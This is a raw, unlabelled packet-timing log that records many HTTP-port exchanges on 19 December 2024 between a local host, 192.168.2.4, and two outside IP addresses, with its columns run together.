                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.746372938 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.746434927 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.746901035 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.746978998 CET4977480192.168.2.4176.53.146.212
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.747014046 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.747113943 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.747323990 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.747584105 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.747896910 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.748023987 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.748090982 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.748840094 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.748904943 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.749007940 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.749051094 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.749758959 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.749876022 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.749936104 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.750058889 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.750684977 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.750766039 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.751094103 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.751136065 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.751597881 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.751658916 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.752067089 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.752181053 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.752693892 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.752720118 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.752753019 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.752779007 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.794156075 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.794176102 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.794192076 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.794197083 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.794217110 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.794226885 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.794260025 CET4977480192.168.2.4176.53.146.212
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.794281960 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.794296026 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.794305086 CET4977480192.168.2.4176.53.146.212
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.794323921 CET4977480192.168.2.4176.53.146.212
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.794353962 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.794379950 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.794384003 CET4977480192.168.2.4176.53.146.212
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.794416904 CET4977480192.168.2.4176.53.146.212
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.794449091 CET4977480192.168.2.4176.53.146.212
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.794475079 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.794559956 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.794569969 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.794584036 CET4977480192.168.2.4176.53.146.212
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.794635057 CET4977480192.168.2.4176.53.146.212
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.794702053 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.794730902 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.794749022 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.794785023 CET4977480192.168.2.4176.53.146.212
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.794862032 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.794900894 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.794996977 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.795084000 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.795150995 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.795254946 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.795357943 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.795468092 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.795480013 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.795592070 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.795670986 CET4977480192.168.2.4176.53.146.212
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.795706987 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.795809031 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.795819044 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.795886040 CET4977480192.168.2.4176.53.146.212
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.795991898 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.796050072 CET4977480192.168.2.4176.53.146.212
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.796812057 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.796880960 CET4977480192.168.2.4176.53.146.212
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.837116957 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.837245941 CET4977480192.168.2.4176.53.146.212
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.866847038 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.867434978 CET4977480192.168.2.4176.53.146.212
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.910610914 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.910748959 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.910792112 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.910792112 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.910978079 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.910993099 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.911039114 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.911073923 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.911942005 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.912084103 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.912094116 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.912201881 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.912930012 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.912986994 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.913064003 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.913115978 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.913702965 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.913765907 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.913851976 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.913942099 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.913954020 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.913990974 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.913994074 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.914035082 CET4977480192.168.2.4176.53.146.212
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.914072990 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.914148092 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.914268970 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.914330006 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.914397955 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.914509058 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.914578915 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.914668083 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.914851904 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.914865017 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.914905071 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.915036917 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.915047884 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.915056944 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.915066957 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.915076971 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.915093899 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.915103912 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.915112972 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.915244102 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.915303946 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.915322065 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.915333986 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.915343046 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.915369034 CET4977480192.168.2.4176.53.146.212
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.915469885 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.915471077 CET4977480192.168.2.4176.53.146.212
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.915502071 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.915529013 CET4977480192.168.2.4176.53.146.212
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.915576935 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.915807009 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.915819883 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.915869951 CET4977480192.168.2.4176.53.146.212
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.915880919 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.916026115 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.916037083 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.916045904 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.916050911 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.916063070 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.916071892 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.916084051 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.916098118 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.916111946 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.916121960 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.916122913 CET4977480192.168.2.4176.53.146.212
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.916132927 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.916142941 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.916189909 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.916235924 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.916249037 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.916362047 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.916414976 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.916425943 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.916449070 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.916769028 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.916769028 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.916781902 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.916790962 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.916824102 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.916917086 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.916927099 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.916935921 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.916945934 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.917005062 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.917015076 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.917018890 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.917022943 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.917027950 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.917074919 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.917084932 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.917097092 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.917207003 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.917217970 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.917314053 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.917324066 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.917334080 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.917401075 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.917413950 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.917468071 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.917854071 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.918348074 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.918406010 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.918468952 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.918524027 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.919230938 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.919310093 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.919652939 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.919877052 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.920283079 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.920327902 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.920357943 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.920398951 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.921060085 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.921127081 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.921658993 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.921705008 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.922069073 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.922117949 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.922223091 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.922264099 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.923079967 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.923126936 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.923248053 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.923360109 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.924206018 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.924474955 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.924532890 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.925417900 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.925478935 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.925592899 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.925648928 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.926456928 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.926501989 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.926537037 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.926580906 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.927412033 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.927479982 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.927506924 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.927520990 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.928268909 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.928338051 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.928462029 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.928530931 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.929167032 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.929208994 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.929562092 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.929604053 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.930052996 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.930102110 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.930238008 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.930284977 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.930918932 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.930967093 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.931361914 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.932024002 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.932079077 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.932777882 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.932929039 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.932943106 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.932975054 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.932991982 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.933777094 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.933819056 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.933892012 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.933933973 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.934541941 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.934607983 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.934642076 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.934674025 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.935509920 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.935602903 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.936130047 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.936202049 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.936348915 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.936405897 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.936887980 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.936939955 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.937108994 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.937158108 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.937314987 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.937355995 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.937865973 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.937966108 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.938311100 CET8049765185.215.113.206192.168.2.4
